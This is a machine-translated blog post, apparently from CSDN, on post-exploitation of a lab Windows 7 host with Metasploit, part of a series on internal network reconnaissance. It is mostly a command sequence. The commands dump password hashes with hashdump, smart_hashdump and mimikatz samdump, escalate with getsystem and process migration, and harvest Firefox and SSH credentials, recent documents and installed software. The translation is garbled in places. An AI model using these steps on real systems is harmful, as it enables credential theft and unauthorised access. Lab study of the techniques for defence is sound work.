当前位置:网站首页>Intranet information collection of Intranet penetration (3)
Intranet information collection of Intranet penetration (3)
2022-07-06 14:29:00 【Unknown white hat】
Catalog
Metasploit Intranet information collection
Ordinary users are entitled to
Intranet information collection of Intranet penetration ( Four )_ Unknown white hat blog -CSDN Blog
Metasploit Intranet information collection
attack kali 192.168.0.103
Drone aircraft win7 192.168.0.105
07 Password cracking
use post/windows/gather/hashdump //system The powers of the meterpreter
set session 1
exploit // The results are stored in tmp Under the table of contents
use post/windows/gather/smart_hashdump
set session 1
exploit
Format
User name :RID:LM-HASH value :NT-HASH value
rid yes windows The system account corresponds to a fixed value , Be similar to linux Of uid,gid Number ,500 by administartor,501 by guest etc. . and lm-hash and nt-hash, They all encrypt user passwords , But the encryption method is different
hashdump It uses mimikatz Part of the function of
load mimikatz
wdigest、kerberos、msv、ssp、tspkg、livessp
mimikatz_command -h
mimikatz_command -f a:: // Query which modules are available
mimikatz_command -f samdump::hashes
mimikatz_command -f samdump::bootkey
Ordinary users are entitled to
getuid
View user permissions
hashdump
Need administrator's permission
getsystem
It's just that on the surface, it has obtained administrator permission , Do not have some real administrator privileges
ps
Check the process
getpid
View the current process
migrate
Process migration ( Migrate ordinary user processes to administrator user processes )
hashdump
08other
Determine whether the target host is a virtual machine :
run checkvm
Get the software installation information on the target host :
run post/windows/gather/enum_applications
Get the most recently accessed documents on the target host 、 Link information :
run post/windows/gather/dumplinks
View the target environment information :
run post/windows/gather/env
see firefox Account and password stored in :
run post/windows/gather/firefox_creds
see ssh Ciphertext information of account password 、 Certificate information :
run post/windows/gather/ssh_creds
边栏推荐
- 外网打点(信息收集)
- JDBC read this article is enough
- xray與burp聯動 挖掘
- 7-6 local minimum of matrix (PTA program design)
- 7-1 output all primes between 2 and n (PTA programming)
- [err] 1055 - expression 1 of order by clause is not in group by clause MySQL
- 《統計學》第八版賈俊平第七章知識點總結及課後習題答案
- Renforcer les dossiers de base de l'apprentissage
- HackMyvm靶机系列(5)-warez
- Hackmyvm target series (3) -visions
猜你喜欢
攻防世界MISC练习区(gif 掀桌子 ext3 )
Hackmyvm Target Series (3) - vues
《统计学》第八版贾俊平第六章统计量及抽样分布知识点总结及课后习题答案
Low income from doing we media? 90% of people make mistakes in these three points
Hackmyvm target series (2) -warrior
网络基础之路由详解
《统计学》第八版贾俊平第三章课后习题及答案总结
New version of postman flows [introductory teaching chapter 01 send request]
Intranet information collection of Intranet penetration (2)
内网渗透之内网信息收集(二)
随机推荐
. Net6: develop modern 3D industrial software based on WPF (2)
内网渗透之内网信息收集(三)
内网渗透之内网信息收集(二)
《统计学》第八版贾俊平第三章课后习题及答案总结
Attach the simplified sample database to the SQLSERVER database instance
Tencent map circle
Intranet information collection of Intranet penetration (2)
Always of SystemVerilog usage_ comb 、always_ iff
Windows platform mongodb database installation
Experiment 7 use of common classes (correction post)
Web vulnerability - File Inclusion Vulnerability of file operation
Strengthen basic learning records
Constants, variables, and operators of SystemVerilog usage
Harmonyos JS demo application development
Statistics 8th Edition Jia Junping Chapter 14 summary of index knowledge points and answers to exercises after class
Network layer - simple ARP disconnection
图书管理系统
DVWA (5th week)
Intranet information collection of Intranet penetration (5)
Experiment 7 use of common classes